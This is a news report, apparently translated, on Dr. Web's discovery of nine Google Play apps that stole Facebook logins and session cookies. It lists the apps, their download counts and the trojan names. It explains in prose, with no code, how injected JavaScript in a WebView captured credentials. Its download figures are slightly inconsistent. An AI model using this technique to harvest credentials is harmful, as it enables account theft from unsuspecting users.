According to foreign media reports, Google recently announced that its nine Android apps have been downloaded more than 5.8 million times in the Play Store. Previously, researchers claimed that these apps stole users’ Facebook login information in a despicable way. According to an article published by the security company Dr. Web, in order to win the trust of users and reduce their vigilance, these applications provide full-featured services-including photo editing and color picking, exercise and training, astrology and removal Junk files on Android devices.
All recognized apps provide users with the option to log in to their Facebook account to disable in-app advertising. Users who choose this option will see a real Facebook login form with fields for entering username and password.
The researchers of Dr. Web wrote:
These Trojans use a special mechanism to deceive their victims. After receiving the necessary settings from a C&C server at startup, they load the legitimate Facebook page https://www.facebook.com/login.php into the WebView. Next, they load the JavaScript received from the C&C server into the same WebView. The script is directly used to hijack the entered login credentials. After that, the JavaScript uses the method provided by the JavascriptInterface annotation to pass the stolen login name and password to the Trojan horse application, and the Trojan horse application transmits the data to the attacker’s C&C server. After the victim logged into their account, the Trojan also stole cookies from the current authorized session. These cookies were also sent to cybercriminals.
Analysis of the malicious program showed that they all received settings to steal the login name and password of their Facebook account. However, an attacker can easily change the Trojan’s settings and order them to load a web page of another legitimate service. They can even use completely fake login forms on phishing websites. Therefore, Trojan horses may be used to steal the login name and password of any service. “
Researchers discovered five malware variants hidden in these applications. Three of them are native Android apps, and the other two use Google’s Flutter framework-which is designed for cross-platform compatibility. Dr. Web pointed out that it categorizes all these Trojans as the same kind of Trojans because they use the same configuration file format and the same JavaScript code to steal user data.
Dr. Web identified these mutations as:
Android.PWS.Facebook.13
Android.PWS.Facebook.14
Android.PWS.Facebook.15
Android.PWS.Facebook.17
Android.PWS.Facebook.18
Most of the downloads come from an application called PIP Photo, which has been downloaded more than 5.8 million times. Next is Processing Photo, which has been downloaded more than 500,000 times. The remaining applications are:
Rubbish Cleaner: over 100,000 downloads
Inwell Fitness: over 100,000 downloads
Horoscope Daily: over 100,000 downloads
App Lock Keep: over 50,000 downloads
Lockit Master: Over 5000 downloads
Horoscope Pi: 1,000 downloads
App Lock Manager: 10 downloads
All these applications have now been removed from Google Play. A Google spokesperson said that the company has also banned all nine app developers from using it in its app store, which means they will not be allowed to submit new apps. Google’s approach is correct, but this is only a small obstacle for developers, because they only need to pay $25 to register a new developer account with a different name.
Anyone who has downloaded the above apps should carefully check their device and Facebook account to see if there are any signs of compromise.
source
Further reading: